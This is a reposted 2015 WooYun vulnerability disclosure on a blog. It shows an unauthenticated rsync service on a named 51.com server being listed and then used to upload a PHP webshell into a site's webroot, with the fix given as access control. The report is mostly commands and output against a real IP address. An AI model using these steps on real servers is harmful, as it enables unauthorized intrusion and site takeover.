记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

51.com某站getshell

2015-02-27 00:20

rsync未授权操作,多个域名绑定的服务器可被入侵,/opt/dbbackup/包含备份数据库

code 区域
[root@localhost ~]# rsync 101.251.197.211::

sds sds.51.com

[root@localhost ~]# rsync 101.251.197.211::sds

drwxr-xr-x 4096 2015/01/05 21:56:55 .

drwxr-xr-x 4096 2014/01/10 11:29:59 admin.sds.51.com

drwxr-xr-x 4096 2014/01/09 00:44:45 api.sds.51.com

drwxr-xr-x 4096 2015/01/04 18:12:44 channel

drwxr-xr-x 4096 2014/04/06 23:57:03 core.sds

drwxr-xr-x 4096 2014/03/24 21:20:56 gm.sds.51.com

drwxr-xr-x 4096 2014/01/18 18:11:03 gw.sds.51.com

drwxr-xr-x 4096 2014/01/09 00:44:45 s.sds.51.com

drwxr-xr-x 4096 2014/03/21 14:03:23 sds.51.com

[root@localhost ~]# rsync 101.251.197.211::sds/api.sds.51.com

drwxr-xr-x 4096 2014/01/09 00:44:45 api.sds.51.com

[root@localhost ~]# rsync 101.251.197.211::sds/api.sds.51.com/

drwxr-xr-x 4096 2014/01/09 00:44:45 .

drwxr-xr-x 4096 2014/07/15 13:17:15 config

drwxr-xr-x 4096 2014/12/22 15:02:16 control

drwxr-xr-x 4096 2014/12/19 16:11:49 helper

drwxr-xr-x 4096 2014/10/16 11:43:11 model

drwxr-xr-x 4096 2015/01/12 22:10:26 wwwroot

漏洞证明:

上传shell

http://api.sds.51.com/help1.php

code 区域
[root@localhost ~]# rsync -avz help1.php 101.251.197.211::sds/api.sds.51.com/wwwroot/

sending incremental file list

help1.php



sent 102 bytes received 27 bytes 86.00 bytes/sec

total size is 32 speedup is 0.25



shell.jpg

修复方案:

访问控制


知识来源: www.wooyun.org/bugs/wooyun-2015-091510

阅读:94276 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“51.com某站getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词